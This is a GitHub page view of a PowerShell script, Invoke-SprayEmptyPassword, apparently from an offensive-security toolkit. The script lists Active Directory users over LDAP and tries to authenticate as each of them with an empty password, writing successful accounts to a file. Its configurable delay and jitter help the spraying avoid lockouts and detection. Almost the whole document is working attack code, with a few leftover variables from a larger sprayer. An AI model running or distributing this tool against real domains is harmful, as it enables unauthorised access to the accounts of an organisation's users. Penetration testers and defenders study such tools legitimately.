-
Notifications
You must be signed in to change notification settings - Fork 238
/
Invoke-SprayEmptyPassword.ps1
152 lines (137 loc) · 4.65 KB
/
Invoke-SprayEmptyPassword.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
function Invoke-SprayEmptyPassword
{
param(
[Parameter(Position = 0, Mandatory = $false)]
[string]
$UserList = "",
[Parameter(Position = 1, Mandatory = $false)]
[string]
$OutFile,
[Parameter(Position = 2, Mandatory = $false)]
[string]
$Domain = "",
[Parameter(Position = 3, Mandatory = $false)]
[int]
$Delay=0,
[Parameter(Position = 4, Mandatory = $false)]
$Jitter=0,
[Parameter(Position = 5, Mandatory = $false)]
[switch]
$RemoveDisabled
)
try
{
if ($Domain -ne "")
{
# Using domain specified with -Domain option
$DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$Domain)
$DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
$CurrentDomain = "LDAP://" + ([ADSI]"LDAP://$Domain").distinguishedName
}
else
{
# Trying to use the current user's domain
$DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$CurrentDomain = "LDAP://" + ([ADSI]"").distinguishedName
Write-Host "Current Domain is $CurrentDomain"
}
}
catch
{
Write-Host -ForegroundColor "red" "[*] Could not connect to the domain. Try specifying the domain name with the -Domain option."
break
}
if ($UserList -eq "")
{
$UserSearcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$CurrentDomain)
$DirEntry = New-Object System.DirectoryServices.DirectoryEntry
$UserSearcher.SearchRoot = $DirEntry
$UserSearcher.PropertiesToLoad.Add("samaccountname") > $Null
if ($RemoveDisabled)
{
Write-Host -ForegroundColor "yellow" "[*] Removing disabled users from list."
$UserSearcher.filter =
"(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=16)(!userAccountControl:1.2.840.113556.1.4.803:=2)$Filter)"
}
else
{
$UserSearcher.filter = "(&(objectCategory=person)(objectClass=user))"
}
$UserSearcher.PageSize = 1000
$AllUserObjects = $UserSearcher.FindAll()
$UserListArray = @()
foreach ($user in $AllUserObjects)
{
$samaccountname = $user.Properties.samaccountname
$UserListArray += $samaccountname
}
}
else
{
# if a Userlist is specified use it and do not check for lockout thresholds
Write-Host "[*] Using $UserList as userlist to spray with"
Write-Host -ForegroundColor "yellow" "[*] Warning: Users will not be checked for lockout threshold."
$UserListArray = @()
try
{
$UserListArray = Get-Content $UserList -ErrorAction stop
}
catch [Exception]
{
Write-Host -ForegroundColor "red" "$_.Exception"
break
}
}
Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -OutFile $OutFile -Delay $Delay -Jitter $Jitter
if (($i+1) -lt $Passwords.count)
{
Countdown-Timer -Seconds (60*$observation_window)
}
}
function Invoke-SpraySinglePassword
{
param(
[Parameter(Position=1)]
$Domain,
[Parameter(Position=2)]
[string[]]
$UserListArray,
[Parameter(Position=3)]
[string]
$OutFile,
[Parameter(Position=4)]
[int]
$Delay=0,
[Parameter(Position=5)]
[double]
$Jitter=0
)
$time = Get-Date
$count = $UserListArray.count
Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.ToShortTimeString())"
$curr_user = 0
Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile"
$RandNo = New-Object System.Random
foreach ($User in $UserListArray)
{
if ($UsernameAsPassword)
{
$Password = $User
}
$Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain,$User,"")
if ($Domain_check.name -ne $null)
{
if ($OutFile -ne "")
{
Add-Content $OutFile $User
}
Write-Host -ForegroundColor Green "[*] SUCCESS! User:$User Password:Empty"
}
$curr_user += 1
Write-Host -nonewline "$curr_user of $count users tested`r`n"
if ($Delay)
{
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
}
}
}